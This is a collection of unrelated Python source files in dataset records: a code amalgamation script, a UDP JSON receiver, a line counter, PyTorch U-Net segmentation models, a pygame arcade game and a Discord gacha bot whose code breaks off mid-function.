HexJoin, obj_km)\n registerKey('G', HexMakeGroup, obj_km)\n\n km_right = registerKey('RIGHT_ARROW', HexMove, obj_km, oskey=False)\n km_left = registerKey('LEFT_ARROW', HexMove, obj_km, oskey=False)\n km_up = registerKey('UP_ARROW', HexMove, obj_km, oskey=False)\n km_down = registerKey('DOWN_ARROW', HexMove, obj_km, oskey=False)\n\n km_right.properties.x = 1\n km_right.properties.y = 0\n km_left.properties.x = -1\n km_left.properties.y = 0\n km_up.properties.x = 0\n km_up.properties.y = 1\n km_down.properties.x = 0\n km_down.properties.y = -1\n\nif __name__ == \"__main__\":\n register()\n","sub_path":"data/frontier_tools.py","file_name":"frontier_tools.py","file_ext":"py","file_size_in_byte":25091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"248888091","text":"#!/usr/bin/python\n\nimport sys\nimport re\nimport os\n\nINCLUDE_RE = re.compile('^#include \"([^\"]*)\"$')\n\ndef parse_include(line):\n match = INCLUDE_RE.match(line)\n return match.groups()[0] if match else None\n\nclass Amalgamator:\n def __init__(self, output_path):\n self.include_paths = [\".\"]\n self.included = set([\"upb/port_def.inc\", \"upb/port_undef.inc\"])\n self.output_h = open(output_path + \"upb.h\", \"w\")\n self.output_c = open(output_path + \"upb.c\", \"w\")\n\n self.output_c.write(\"/* Amalgamated source file */\\n\")\n self.output_c.write('#include \"upb.h\"\\n')\n self.output_c.write(open(\"upb/port_def.inc\").read())\n\n self.output_h.write(\"/* Amalgamated source file 
*/\n\")\n self.output_h.write('#include ')\n self.output_h.write(open(\"upb/port_def.inc\").read())\n\n def add_include_path(self, path):\n self.include_paths.append(path)\n\n def finish(self):\n self.output_c.write(open(\"upb/port_undef.inc\").read())\n self.output_h.write(open(\"upb/port_undef.inc\").read())\n\n def _process_file(self, infile_name, outfile):\n file = None\n for path in self.include_paths:\n try:\n full_path = os.path.join(path, infile_name)\n file = open(full_path)\n break\n except IOError:\n pass\n if not file:\n raise RuntimeError(\"Couldn't open file \" + infile_name)\n\n for line in file:\n include = parse_include(line)\n if include is not None and (include.startswith(\"upb\") or\n include.startswith(\"google\")):\n if include not in self.included:\n self.included.add(include)\n self._add_header(include)\n else:\n outfile.write(line)\n\n def _add_header(self, filename):\n self._process_file(filename, self.output_h)\n\n def add_src(self, filename):\n self._process_file(filename, self.output_c)\n\n# ---- main ----\n\noutput_path = sys.argv[1]\namalgamator = Amalgamator(output_path)\nfiles = []\n\nfor arg in sys.argv[2:]:\n arg = arg.strip()\n if arg.startswith(\"-I\"):\n amalgamator.add_include_path(arg[2:])\n elif arg.endswith(\".h\") or arg.endswith(\".inc\"):\n pass\n else:\n files.append(arg)\n\nfor filename in files:\n amalgamator.add_src(filename)\n\namalgamator.finish()\n","sub_path":"MY_REPOS/misc-experiments/_FIREBFIRE/grpc-SwiftPM/third_party/upb/tools/amalgamate.py","file_name":"amalgamate.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"468874557","text":"import json\nimport socket, sys, time\n\ntextport = sys.argv[1]\n\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nport = int(textport)\nserver_address = ('localhost', port)\ns.bind(server_address)\n\nfor i in range(0,10):\n buf, address = s.recvfrom(4096) # recvfrom() takes a buffer size in bytes; the original mistakenly passed the port number here\n if not len(buf):\n break\n x = json.loads(buf.decode('utf-8'))\n print(x)\n\n","sub_path":"SYSC3010 Lab 4/JSONreceiver.py","file_name":"JSONreceiver.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"191294553","text":"'''\nNo. 0007: There is a directory containing programs you have written. Count how many lines of code you have written; include blank lines and comments, but list them separately.\n'''\n\n#!/usr/bin/env python\n \nimport os\n\n\n'''\n Walk a directory tree and return the list of .py file paths\n'''\ndef walk_dir(path):\n file_path = []\n for root, dirs, files in os.walk(path):\n for f in files:\n if f.lower().endswith('py'):\n file_path.append(os.path.join(root, f))\n return file_path\n\n'''\n Count lines of code, comments and blank lines\n''' \ndef codes_stat(file_path):\n file_name = os.path.basename(file_path)\n note_flag = False\n line_num = 0\n empty_line_num = 0\n note_num = 0\n\n with open(file_path) as f:\n # for line in f.read().split('\\n'):\n for line in f:\n\n line_num += 1\n if line.strip().startswith('\\\"\\\"\\\"') and not note_flag:\n note_flag = True\n note_num += 1\n continue\n\n if line.strip().startswith('\\\"\\\"\\\"'):\n note_flag = False\n note_num += 1\n\n if line.strip().startswith('#') or note_flag:\n note_num += 1\n\n # lines read from a file keep their trailing '\\n', so test the stripped line\n if not line.strip():\n empty_line_num += 1\n print(\"%s: %s lines in total, of which %s are blank and %s are comments\" % (file_name, line_num, empty_line_num, note_num))\n\n\nif __name__ == '__main__':\n file_path = walk_dir('/media/mingrui/H/Python/Practice')\n for item in file_path:\n codes_stat(item)
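\n\n # Editor's addition -- a small, hedged sanity check of codes_stat (assumes a\n # throwaway temp file is acceptable): the sample has one comment line, one\n # blank line and one code line, so it should report 3 lines, 1 blank, 1 comment.\n import tempfile\n with tempfile.NamedTemporaryFile('w', suffix='.py', delete=False) as tmp:\n tmp.write('# a comment\\n\\nx = 1\\n')\n codes_stat(tmp.name)\n os.remove(tmp.name)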
\n","sub_path":"0007/0007.py","file_name":"0007.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"278718920","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport torchvision\nfrom torchvision import models\n\n\ndef conv3x3(in_ch, out_ch):\n return nn.Conv2d(in_ch, out_ch, kernel_size=3, padding=1, dilation=1)\n\n\nclass ConvRelu(nn.Module):\n def __init__(self, in_ch, out_ch):\n super().__init__()\n self.conv = conv3x3(in_ch, out_ch)\n self.activation = nn.ReLU(inplace=True)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.activation(x)\n return x\n\n\nclass Interpolate(nn.Module):\n def __init__(self, size=None, scale_factor=None, mode='nearest', align_corners=False):\n super().__init__()\n self.interp = F.interpolate\n self.size = size\n self.mode = mode\n self.scale_factor = scale_factor\n self.align_corners = align_corners\n\n self.kwargs = dict(size=self.size, scale_factor=self.scale_factor, mode=self.mode)\n if self.mode != 'nearest':\n self.kwargs['align_corners'] = self.align_corners\n\n def forward(self, x):\n x = self.interp(x, **self.kwargs)\n return x\n\n\nclass DecoderBlock(nn.Module):\n def __init__(self, in_ch, mid_ch, out_ch, upsampling=False):\n super().__init__()\n self.in_ch = in_ch\n\n if not upsampling:\n self.block = nn.Sequential(\n ConvRelu(in_ch, mid_ch),\n nn.ConvTranspose2d(mid_ch, out_ch, kernel_size=3, stride=2, padding=1, output_padding=1),\n nn.ReLU(inplace=True)\n )\n else:\n self.block = nn.Sequential(\n # Interpolate(scale_factor=2, mode='bilinear'),\n Interpolate(scale_factor=2, mode='nearest'),\n ConvRelu(in_ch, mid_ch),\n ConvRelu(mid_ch, out_ch)\n )\n\n def forward(self, x):\n return self.block(x)\n\n\nclass UNet11(nn.Module):\n def __init__(self, num_filters=32, pretrained=True):\n super().__init__()\n self.pool = nn.MaxPool2d(kernel_size=2, stride=2)\n self.relu = nn.ReLU(inplace=True)\n\n encoder = models.vgg11(pretrained=pretrained).features\n\n self.conv1 = encoder[0] # 3 -> 64\n self.conv2 = encoder[3] # 64 -> 128\n self.conv3_1 = encoder[6] # 128 -> 256\n self.conv3_2 = encoder[8] # 256 -> 256\n self.conv4_1 = encoder[11] # 256 -> 512\n self.conv4_2 = encoder[13] # 512 -> 512\n self.conv5_1 = encoder[16] # 512 -> 512\n self.conv5_2 = encoder[18] # 512 -> 512\n\n self.center = DecoderBlock(num_filters * 16, num_filters * 16, num_filters * 8, upsampling=True)\n\n self.dec5 = DecoderBlock(num_filters * (8 + 16), num_filters * 16, num_filters * 8, upsampling=True)\n self.dec4 = DecoderBlock(num_filters * (8 + 16), num_filters * 16, num_filters * 4, upsampling=True)\n self.dec3 = DecoderBlock(num_filters * (4 + 8), num_filters * 8, num_filters * 2, upsampling=True)\n self.dec2 = DecoderBlock(num_filters * (2 + 4), num_filters * 4, num_filters, upsampling=True)\n self.dec1 = ConvRelu(num_filters * (1 + 2), num_filters)\n\n self.final = nn.Conv2d(num_filters, 1, kernel_size=1)\n\n def forward(self, x):\n conv1 = self.relu(self.conv1(x))\n conv2 = self.relu(self.conv2(self.pool(conv1)))\n conv3_1 = self.relu(self.conv3_1(self.pool(conv2)))\n conv3_2 = self.relu(self.conv3_2(conv3_1))\n conv4_1 = self.relu(self.conv4_1(self.pool(conv3_2)))\n conv4_2 = self.relu(self.conv4_2(conv4_1))\n conv5_1 = self.relu(self.conv5_1(self.pool(conv4_2)))\n conv5_2 = self.relu(self.conv5_2(conv5_1))\n\n center = self.center(self.pool(conv5_2))\n\n dec5 = self.dec5(torch.cat([center, conv5_2], dim=1))\n dec4 = 
self.dec4(torch.cat([dec5, conv4_2], dim=1))\n dec3 = self.dec3(torch.cat([dec4, conv3_2], dim=1))\n dec2 = self.dec2(torch.cat([dec3, conv2], dim=1))\n dec1 = self.dec1(torch.cat([dec2, conv1], dim=1))\n\n return self.final(dec1)\n\n\nclass DecoderBlockV2(nn.Module):\n def __init__(self, in_channels, middle_channels, out_channels, is_deconv=True):\n super(DecoderBlockV2, self).__init__()\n self.in_channels = in_channels\n\n if is_deconv:\n \"\"\"\n Paramaters for Deconvolution were chosen to avoid artifacts, following\n link https://distill.pub/2016/deconv-checkerboard/\n \"\"\"\n\n self.block = nn.Sequential(\n ConvRelu(in_channels, middle_channels),\n nn.ConvTranspose2d(middle_channels, out_channels, kernel_size=4, stride=2,\n padding=1),\n nn.ReLU(inplace=True)\n )\n else:\n self.block = nn.Sequential(\n Interpolate(scale_factor=2, mode='nearest'),\n ConvRelu(in_channels, middle_channels),\n ConvRelu(middle_channels, out_channels),\n )\n\n def forward(self, x):\n return self.block(x)\n\n\nclass AlbuNet(nn.Module):\n \"\"\"\n UNet (https://arxiv.org/abs/1505.04597) with Resnet34(https://arxiv.org/abs/1512.03385) encoder\n Proposed by Alexander Buslaev: https://www.linkedin.com/in/al-buslaev/\n \"\"\"\n\n def __init__(self, num_classes=1, num_filters=32, pretrained=False, is_deconv=False):\n \"\"\"\n :param num_classes:\n :param num_filters:\n :param pretrained:\n False - no pre-trained network is used\n True - encoder is pre-trained with resnet34\n :is_deconv:\n False: bilinear interpolation is used in decoder\n True: deconvolution is used in decoder\n \"\"\"\n super().__init__()\n self.num_classes = num_classes\n\n self.pool = nn.MaxPool2d(2, 2)\n\n self.encoder = torchvision.models.resnet34(pretrained=pretrained)\n\n self.relu = nn.ReLU(inplace=True)\n\n self.conv1 = nn.Sequential(self.encoder.conv1,\n self.encoder.bn1,\n self.encoder.relu,\n self.pool)\n\n self.conv2 = self.encoder.layer1\n\n self.conv3 = self.encoder.layer2\n\n self.conv4 = self.encoder.layer3\n\n self.conv5 = self.encoder.layer4\n\n self.center = DecoderBlockV2(512, num_filters * 8 * 2, num_filters * 8, is_deconv)\n\n self.dec5 = DecoderBlockV2(512 + num_filters * 8, num_filters * 8 * 2, num_filters * 8, is_deconv)\n self.dec4 = DecoderBlockV2(256 + num_filters * 8, num_filters * 8 * 2, num_filters * 8, is_deconv)\n self.dec3 = DecoderBlockV2(128 + num_filters * 8, num_filters * 4 * 2, num_filters * 2, is_deconv)\n self.dec2 = DecoderBlockV2(64 + num_filters * 2, num_filters * 2 * 2, num_filters * 2 * 2, is_deconv)\n self.dec1 = DecoderBlockV2(num_filters * 2 * 2, num_filters * 2 * 2, num_filters, is_deconv)\n self.dec0 = ConvRelu(num_filters, num_filters)\n self.final = nn.Conv2d(num_filters, num_classes, kernel_size=1)\n\n def forward(self, x):\n conv1 = self.conv1(x)\n conv2 = self.conv2(conv1)\n conv3 = self.conv3(conv2)\n conv4 = self.conv4(conv3)\n conv5 = self.conv5(conv4)\n\n center = self.center(self.pool(conv5))\n\n dec5 = self.dec5(torch.cat([center, conv5], 1))\n\n dec4 = self.dec4(torch.cat([dec5, conv4], 1))\n dec3 = self.dec3(torch.cat([dec4, conv3], 1))\n dec2 = self.dec2(torch.cat([dec3, conv2], 1))\n dec1 = self.dec1(dec2)\n dec0 = self.dec0(dec1)\n\n if self.num_classes > 1:\n x_out = F.log_softmax(self.final(dec0), dim=1)\n else:\n x_out = self.final(dec0)\n\n return x_out\n\n\nclass UNet16(nn.Module):\n def __init__(self, num_classes=1, num_filters=32, pretrained=False, is_deconv=False):\n \"\"\"\n :param num_classes:\n :param num_filters:\n :param pretrained:\n False - no pre-trained network 
used\n True - encoder pre-trained with VGG16\n :is_deconv:\n False: bilinear interpolation is used in decoder\n True: deconvolution is used in decoder\n \"\"\"\n super().__init__()\n self.num_classes = num_classes\n\n self.pool = nn.MaxPool2d(2, 2)\n\n self.encoder = torchvision.models.vgg16(pretrained=pretrained).features\n\n self.relu = nn.ReLU(inplace=True)\n\n self.conv1 = nn.Sequential(self.encoder[0],\n self.relu,\n self.encoder[2],\n self.relu)\n\n self.conv2 = nn.Sequential(self.encoder[5],\n self.relu,\n self.encoder[7],\n self.relu)\n\n self.conv3 = nn.Sequential(self.encoder[10],\n self.relu,\n self.encoder[12],\n self.relu,\n self.encoder[14],\n self.relu)\n\n self.conv4 = nn.Sequential(self.encoder[17],\n self.relu,\n self.encoder[19],\n self.relu,\n self.encoder[21],\n self.relu)\n\n self.conv5 = nn.Sequential(self.encoder[24],\n self.relu,\n self.encoder[26],\n self.relu,\n self.encoder[28],\n self.relu)\n\n self.center = DecoderBlockV2(512, num_filters * 8 * 2, num_filters * 8, is_deconv)\n\n self.dec5 = DecoderBlockV2(512 + num_filters * 8, num_filters * 8 * 2, num_filters * 8, is_deconv)\n self.dec4 = DecoderBlockV2(512 + num_filters * 8, num_filters * 8 * 2, num_filters * 8, is_deconv)\n self.dec3 = DecoderBlockV2(256 + num_filters * 8, num_filters * 4 * 2, num_filters * 2, is_deconv)\n self.dec2 = DecoderBlockV2(128 + num_filters * 2, num_filters * 2 * 2, num_filters, is_deconv)\n self.dec1 = ConvRelu(64 + num_filters, num_filters)\n self.final = nn.Conv2d(num_filters, num_classes, kernel_size=1)\n\n def forward(self, x):\n conv1 = self.conv1(x)\n conv2 = self.conv2(self.pool(conv1))\n conv3 = self.conv3(self.pool(conv2))\n conv4 = self.conv4(self.pool(conv3))\n conv5 = self.conv5(self.pool(conv4))\n\n center = self.center(self.pool(conv5))\n\n dec5 = self.dec5(torch.cat([center, conv5], 1))\n\n dec4 = self.dec4(torch.cat([dec5, conv4], 1))\n dec3 = self.dec3(torch.cat([dec4, conv3], 1))\n dec2 = self.dec2(torch.cat([dec3, conv2], 1))\n dec1 = self.dec1(torch.cat([dec2, conv1], 1))\n\n if self.num_classes > 1:\n x_out = F.log_softmax(self.final(dec1), dim=1)\n else:\n x_out = self.final(dec1)\n\n return x_out","sub_path":"src/am/segment/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"555420460","text":"# Import random module\n# Import pygame library and initialise it\nimport random\nimport pygame\npygame.init()\n\n# Create variables for basic colours\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\nred = (255, 0, 0)\ngreen = (0, 255, 0)\nblue = (0, 0, 255)\n\n# Store values for screen width and length in variables \"screen_width\" and \"screen_length\" respectively\nscreen_width = 1040\nscreen_height = 680\nscreen = pygame.display.set_mode((screen_width, screen_height))\n\n# Set an icon and caption for the screen\nicon = pygame.image.load(\"superhero.png\")\npygame.display.set_icon(icon)\npygame.display.set_caption(\"Save The Baby!\")\n\n# Load the hero image\nhero = pygame.image.load(\"superhero.png\")\n\n# Load all alien images\nalien = pygame.image.load(\"alien1.png\")\nalien2 = pygame.image.load(\"alien2.png\")\nalien3 = pygame.image.load(\"alien3.png\")\nalien4 = pygame.image.load(\"alien4.png\")\nalien5 = pygame.image.load(\"alien5.png\")\nalien6 = pygame.image.load(\"alien6.png\")\n\n# Load baby image\nbaby = pygame.image.load(\"baby.png\")\n\n# Get the height and width for the hero, aliens, and baby\nhero_height = 
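A quick shape check for the U-Net variants in model.py above (a sketch: it assumes torch and torchvision are installed, and the input side lengths must be divisible by 32 because each encoder downsamples five times):

    import torch

    model = UNet11(pretrained=False)
    x = torch.randn(1, 3, 256, 256)
    with torch.no_grad():
        y = model(x)
    print(y.shape)  # torch.Size([1, 1, 256, 256]): one logit map per image

AlbuNet and UNet16 behave the same way for num_classes=1; with num_classes > 1 they return per-class log-probabilities through F.log_softmax instead.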
hero.get_height()\nhero_width = hero.get_width()\nalien_height = alien.get_height()\nalien_width = alien.get_width()\nbaby_width = baby.get_width()\nbaby_height = baby.get_height()\n\nprint(\"\\n===== Save The Baby! =====\\n\")\n\n# Give the hero a starting position - close to the centre of the screen\nheroXposition = 450\nheroYposition = 300\n\n# Give each alien a starting position - off the screen\nalienXposition = screen_width\nalienYposition = random.randint(0, screen_height - alien_height)\nalien2Xposition = -400\nalien2Yposition = random.randint(0, screen_height - alien_height)\nalien3Xposition = screen_width + 700\nalien3Yposition = random.randint(0, screen_height - alien_height)\nalien4Xposition = random.randint(0, screen_width - alien_width)\nalien4Yposition = screen_height + 100\nalien5Xposition = random.randint(0, screen_width - alien_width)\nalien5Yposition = -400\nalien6Xposition = random.randint(0, screen_width - alien_width)\nalien6Yposition = screen_height + 800\n\n# Give the baby a starting position - off the screen\nbabyXposition = screen_width + 400\nbabyYposiion = random.randint(0, screen_height - baby_height)\n\n# Give the hero, alien and baby a speed - amount of pixels by which they move\nhero_speed = 10\nalien_speed = 8\nbaby_speed = 6\n\n# Create while loop(the game loop)\ngaming = True\nwhile gaming:\n # Use time.delay to set how fast the screen should refresh\n pygame.time.delay(30)\n # Reset the screen after each loop\n screen.fill(black)\n # Blit the hero image on to the screen\n screen.blit(hero, (heroXposition, heroYposition))\n # Blit all alien images on to the screen\n screen.blit(alien, (alienXposition, alienYposition))\n screen.blit(alien2, (alien2Xposition, alien2Yposition))\n screen.blit(alien3, (alien3Xposition, alien3Yposition))\n screen.blit(alien4, (alien4Xposition, alien4Yposition))\n screen.blit(alien5, (alien5Xposition, alien5Yposition))\n screen.blit(alien6, (alien6Xposition, alien6Yposition))\n # Blit the baby image on to the screen\n screen.blit(baby, (babyXposition, babyYposiion))\n # Update the screen after every change that has happened\n pygame.display.update()\n # Create for loop for all events that will happen\n for event in pygame.event.get():\n # If the user clicks on the \"X\" the screen closes\n if event.type == pygame.QUIT:\n gaming = False\n # Use if statements to control what happens when each arrow is pressed\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT] and heroXposition > 0:\n heroXposition -= hero_speed\n if keys[pygame.K_RIGHT] and heroXposition < (screen_width - hero_width):\n heroXposition += hero_speed\n if keys[pygame.K_UP] and heroYposition > 0:\n heroYposition -= hero_speed\n if keys[pygame.K_DOWN] and heroYposition < (screen_height - hero_height):\n heroYposition += hero_speed\n # Control the direction and speed in which each alien moves across the screen\n alienXposition -= alien_speed\n alien2Xposition += alien_speed\n alien3Xposition -= alien_speed\n alien4Yposition -= alien_speed\n alien5Yposition += alien_speed\n alien6Yposition -= alien_speed\n # Control the direction and speed in which the baby moves across the screen\n babyXposition -= baby_speed\n # Create a \"box\" around the hero image\n hero_box = pygame.Rect(hero.get_rect())\n hero_box.top = heroYposition\n hero_box.left = heroXposition\n # Create a \"box\" around each alien image\n # If the hero \"box\" and \"alien\" box collide - close screen and print \"Killed by aliens.\"\n alien_box = pygame.Rect(alien.get_rect())\n alien_box.top = 
alienYposition\n alien_box.left = alienXposition\n\n if hero_box.colliderect(alien_box):\n print(\"\\n\\n>>> Killed by aliens.\\n\\n\")\n pygame.quit()\n\n alien2_box = pygame.Rect(alien2.get_rect())\n alien2_box.top = alien2Yposition\n alien2_box.left = alien2Xposition\n\n if hero_box.colliderect(alien2_box):\n print(\"\\n\\n>>> Killed by aliens.\\n\\n\")\n pygame.quit()\n\n alien3_box = pygame.Rect(alien3.get_rect())\n alien3_box.top = alien3Yposition\n alien3_box.left = alien3Xposition\n\n if hero_box.colliderect(alien3_box):\n print(\"\\n\\n>>> Killed by aliens.\\n\\n\")\n pygame.quit()\n\n alien4_box = pygame.Rect(alien4.get_rect())\n alien4_box.top = alien4Yposition\n alien4_box.left = alien4Xposition\n\n if hero_box.colliderect(alien4_box):\n print(\"\\n\\n>>> Killed by aliens.\\n\\n\")\n pygame.quit()\n\n alien5_box = pygame.Rect(alien5.get_rect())\n alien5_box.top = alien5Yposition\n alien5_box.left = alien5Xposition\n\n if hero_box.colliderect(alien5_box):\n print(\"\\n\\n>>> Killed by aliens.\\n\\n\")\n pygame.quit()\n\n alien6_box = pygame.Rect(alien6.get_rect())\n alien6_box.top = alien6Yposition\n alien6_box.left = alien6Xposition\n\n if hero_box.colliderect(alien6_box):\n print(\"\\n\\n>>> Killed by aliens.\\n\\n\")\n pygame.quit()\n # If the hero \"box\" collides with the baby \"box\" - close the screen and print \"You saved the baby!\"\n baby_box = pygame.Rect(baby.get_rect())\n baby_box.top = babyYposiion\n baby_box.left = babyXposition\n\n if hero_box.colliderect(baby_box):\n print(\"\\n\\n>>> You saved the baby!\\n\\n\")\n pygame.quit()\n # If the baby moves off the screen - close screen and print (\"The aliens caught the baby\")\n if babyXposition < 0 - baby_width:\n print(\"\\n\\nThe aliens caught the baby.\\n\\n\")\n pygame.quit()\n","sub_path":"Save_The_Baby.py","file_name":"Save_The_Baby.py","file_ext":"py","file_size_in_byte":6569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"462524258","text":"import os\nimport django\nfrom django.db.models import F\nimport discord\nfrom discord.ext import commands\nimport config\nfrom datetime import datetime\nfrom pytz import timezone\nfrom random import choices, uniform\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'web.config.settings')\ndjango.setup()\nfrom web.apps.items.models import Item, ItemStatRange\nfrom web.apps.gachas.models import TreasureBoxGacha\nfrom web.apps.users.models import DiscordUser, GachaInfo\n\n\nclass Gacha(commands.Cog):\n \"\"\"A cog for gacha commands\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n def is_treasure_box_channel(context):\n if config.DEBUG:\n return context.message.channel.id == '454890599410302977'\n else:\n return context.message.channel.id == '481712884196573194'\n\n @commands.command(aliases=['g', 'gs'])\n @commands.check(is_treasure_box_channel)\n async def gacha(self, context, job=None, rolls=None):\n \"\"\"MapleStory Mobile Treasure Box Gacha\"\"\"\n\n author = context.author\n prefix = self.bot.command_prefix\n command_name = context.invoked_with\n\n discord_user = self.check_user_in_db(author.id, author.name)\n\n if job is None:\n\n embed = discord.Embed(\n title=f'Cách quay rương và các lệnh liên quan',\n description=f'• **`{prefix}g`** **`{prefix}gs`** : hiện hướng dẫn này.\\n'\n f'• **`{prefix}g job`** : Quay rương 10+1 lần.\\n'\n f'• **`{prefix}gs job`** : Quay rương 1 lần.\\n'\n '`job` là tên viết tắt của Job muốn quay rương.\\n'\n f'• **`{prefix}glist`** : xem tên viết tắt của các Job có thể quay 
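In Save_The_Baby.py above, every end-of-game branch calls pygame.quit() while the while-loop keeps running, so the next iteration's blit/update calls hit an uninitialised display and raise pygame.error. Setting the loop flag and quitting once after the loop is the usual pattern (one branch shown; the same change applies to all of them):

    if hero_box.colliderect(alien_box):
        print("\n\n>>> Killed by aliens.\n\n")
        gaming = False  # leave the game loop cleanly

    # ...then, exactly once, after the loop ends:
    # pygame.quit()

The consistently misspelled babyYposiion also works as written, but renaming it to babyYposition would avoid confusion.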
rương.\\n'\n f'• **`{prefix}gdaily`** : nhận 10,000 :gem: (Pha lê) để quay rương hằng ngày (reset vào 00:00 sáng).\\n'\n f'• **`{prefix}ginfo`** : xem thông tin rương đồ của mình.',\n color=discord.Color.teal())\n embed.add_field(\n name='Thông tin cần biết',\n value='• Quay rương 10+1 lần sẽ cần **1,000 :gem:**; Quay rương 1 lần sẽ cần **100 :gem:**.\\n'\n '• Tỷ lệ ra đồ dựa trên bảng tỷ lệ của Nexon, [xem tại đây](https://m.nexon.com/terms/353)\\n'\n '• Chỉ số của item sẽ **ngẫu nhiên** trong khoảng Min - Max của item đó.\\n'\n '[**Credits to Lukishi**](https://docs.google.com/spreadsheets/d/1zEix7SJoHMyqKJxxheUtluKLOEmwtfgTJwXENZHsEoY/htmlview)\\n'\n '• Các món đồ có nền (Emblem) không đủ dữ kiện, nên sẽ tạm tính chỉ số Min - Max **bằng 130%** so với item không có nền\\n'\n '• Tỷ lệ ra nền chưa xác định, nên sẽ tạm cho là **10%**.')\n embed.add_field(\n name='Ví dụ',\n value=f'• Quay rương 10+1 cho Dark Knight: **`{prefix}g dk`**\\n'\n f'• Quay rương 1 cho Bishop: **`{prefix}gs bs`**\\n'\n f'Có thể dùng tên job viết liền (không dấu cách) để quay rương:\\n**`{prefix}g darkknight`**',)\n await context.say_as_embed(embed=embed)\n\n else:\n if command_name == 'g':\n rolls = 11\n min_cr = 1000\n elif command_name == 'gs':\n rolls = 1\n min_cr = 100\n\n # inform the user that they don't have enough crystals for gacha to work\n if rolls:\n if discord_user.gacha_info.crystal_owned < min_cr:\n embed = discord.Embed(\n title=f'Không thể quay rương, số :gem: không đủ',\n description=f'{author.mention}, bạn đang có {discord_user.gacha_info.crystal_owned} :gem:.'\n f' Cần tối thiểu {\"{:,}\".format(min_cr)} :gem: để quay rương.\\n'\n f'Nhập lệnh `{prefix}gdaily` để nhận :gem: hằng ngày nhé!',\n color=discord.Color.teal())\n await context.say_as_embed(embed=embed)\n return\n # take 1,000 crystals from the user's balance\n else:\n discord_user.gacha_info.crystal_owned = F('crystal_owned') - min_cr\n discord_user.gacha_info.crystal_used = F('crystal_used') + min_cr\n\n # process job given by the user\n if job.lower() in ['dk', 'darkknight']:\n job_processed = 'Dark Knight'\n elif job.lower() in ['bm', 'bowmaster']:\n job_processed = 'Bowmaster'\n elif job.lower() in ['bs', 'bis', 'bish', 'bishop']:\n job_processed = 'Bishop'\n elif job.lower() in ['nl', 'nightlord']:\n job_processed = 'Night Lord'\n elif job.lower() in ['cs', 'cor', 'sair', 'corsair']:\n job_processed = 'Corsair'\n elif job.lower() in ['dw', 'dawnwarior']:\n job_processed = 'Dawn Warrior'\n elif job.lower() in ['wa', 'windarcher']:\n job_processed = 'Wind Archer'\n elif job.lower() in ['bw', 'blazewizard']:\n job_processed = 'Blaze Wizard'\n elif job.lower() in ['nw', 'nightwalker']:\n job_processed = 'Night Walker'\n elif job.lower() in ['tb', 'thunderbreaker']:\n job_processed = 'Thunder Breaker'\n else:\n embed = discord.Embed(\n title=f'Không tìm được Job với cụm: {job}',\n description=f'Vui lòng thử lại với *tên viết tắt của Job* hoặc *tên đầy đủ không dấu cách*.',\n colour=discord.Color.teal())\n await context.say_as_embed(embed=embed)\n return\n\n gacha_items = TreasureBoxGacha.objects.filter(job__job=job_processed)\n rate = []\n for item in gacha_items:\n rate.append(item.rate)\n\n if rolls == 1:\n result = choices(gacha_items, rate, k=rolls)\n else:\n result = choices(gacha_items, rate, k=rolls - 1)\n\n # for guaranteed unique item with multi rolls\n guaranteed = gacha_items.filter(rank__rank='Unique')\n uresult = choices(guaranteed)[0]\n result.append(uresult)\n\n # randomly give Emblem to Unique/Legendary items with the rate 
of 10%\n # items with Emblem have an increase of stats of 30%\n emblem = ['(Emblem)', None]\n weights = [0.1, 0.9]\n emblem_stat_increase = 0.3\n # populate this to show the result in discord embed\n display_result = []\n # populate this to count number of items per rank\n rank_counts = []\n\n # process the result for final data display\n for gacha in result:\n\n sub_type = gacha.item.sub_type\n job = gacha.item.job\n rank = gacha.rank\n\n rank_counts.append(rank.rank)\n\n display_data = {\n 'rank': rank.rank,\n 'sub_type': sub_type.sub_type,\n 'stat': {}\n }\n\n # give some emotes to distinguish item types\n if sub_type.type.type == 'Weapon':\n display_data.update({'name': f':crossed_swords: {gacha.item.name}'})\n elif sub_type.type.type == 'Armor':\n display_data.update({'name': f':shield: {gacha.item.name}'})\n elif sub_type.type.type == 'Armor':\n display_data.update({'name': f':ring: {gacha.item.name}'})\n else:\n display_data.update({'name': gacha.item.name})\n\n # randomize stats\n stats = gacha.item.stats.all()\n for stat in stats:\n try:\n stat_range = ItemStatRange.objects.get(sub_type=sub_type, rank=rank, stat=stat, job=job)\n except ItemStatRange.DoesNotExist:\n # print(f'Not recognized stat: {stat}. Please check ItemStatRange data.')\n continue\n stat_amount = uniform(stat_range.min, stat_range.max)\n display_data['stat'].update({stat.stat: round(stat_amount)})\n\n # add emblem\n if gacha.rank.rank in ['Unique', 'Legendary']:\n\n # rank decorator based on rank\n if gacha.rank.rank == 'Unique':\n display_data['rank'] += ' :orange_book:'\n else:\n display_data['rank'] += ' :green_book:'\n\n em = choices(emblem, weights)[0]\n # increase emblem item count and modify stats\n if em:\n display_data['name'] += f' {em}'\n for key, value in display_data['stat'].items():\n display_data['stat'][key] = round(value * (1 + emblem_stat_increase))\n\n if gacha.rank.rank == 'Unique':\n discord_user.gacha_info.unique_emblem_item_count = F('unique_emblem_item_count') + 1\n elif gacha.rank.rank == 'Legendary':\n discord_user.gacha_info.legendary_emblem_item_count = F('legendary_emblem_item_count') + 1\n display_result.append(display_data)\n\n # count items based on ranks\n item_rank_count = [0, 0, 0, 0]\n for item in rank_counts:\n if item == 'Rare':\n item_rank_count[0] += 1\n elif item == 'Epic':\n item_rank_count[1] += 1\n elif item == 'Unique':\n item_rank_count[2] += 1\n elif item == 'Legendary':\n item_rank_count[3] += 1\n\n # update the user gacha 